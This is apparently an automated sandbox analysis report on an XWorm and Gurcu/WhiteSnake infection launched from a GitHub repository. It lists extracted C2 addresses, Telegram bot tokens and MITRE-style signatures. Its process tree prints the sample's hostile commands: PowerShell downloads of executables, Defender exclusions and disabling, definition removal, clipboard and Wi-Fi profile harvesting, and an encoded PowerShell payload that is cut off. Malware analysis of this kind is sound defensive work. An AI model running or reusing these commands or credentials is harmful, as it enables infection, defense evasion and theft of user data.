Analysis
-
max time kernel
383s -
max time network
378s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
-
submitted
12-02-2025 09:51
General
-
Target
https://github.com/newbigs/newintsh
Malware Config
Extracted
xworm
5.0
172.245.20.209:7000
64.7.198.74:7000
2r6vo6BvMgtBs26q
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7745567455:AAHJJMwjM2fEKRTzDuYpjGsEm_c35cD-3mY
Extracted
gurcu
https://api.telegram.org/bot7745567455:AAHJJMwjM2fEKRTzDuYpjGsEm_c35cD-3mY/sendMessage?chat_id=-4702051411
https://api.telegram.org/bot7789746445:AAHZp-GtY5N35XwplIUS6rf6BjuHebMQYw0/sendMessage?chat_id=-4553928412
Signatures
-
Detect Xworm Payload 4 IoCs
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Blocklisted process makes network request 20 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Powershell Invoke Web Request.
-
Downloads MZ/PE file 8 IoCs
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 11 IoCs
-
Loads dropped DLL 49 IoCs
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
UPX packed file 64 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 9 IoCs
-
Modifies registry class 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/newbigs/newintsh2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabc4746f8,0x7ffabc474708,0x7ffabc4747183⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5876 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5736 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,8647252870218569418,12996388764190023770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:83⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_wins.zip\wins.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_wins.zip\wins.exe"2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/ZNctu" -OutFile "C:\Users\Public\Guard.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au34⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_wins.zip\wins.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_wins.zip\wins.exe"2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/ZNctu" -OutFile "C:\Users\Public\Guard.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au34⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_wins.zip\wins.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_wins.zip\wins.exe"2⤵
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/ZNctu" -OutFile "C:\Users\Public\Guard.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au34⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Downloads\wti\winx.exe"C:\Users\Admin\Downloads\wti\winx.exe"2⤵
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/JjlTHchjP" -OutFile "C:\Users\Public\Guard.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au34⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\Downloads\wti\wti.exe"C:\Users\Admin\Downloads\wti\wti.exe"2⤵
-
C:\Users\Admin\Downloads\wti\wti.exe"C:\Users\Admin\Downloads\wti\wti.exe"3⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\wti\wti.exe'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\wti\wti.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()""4⤵
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()"5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJ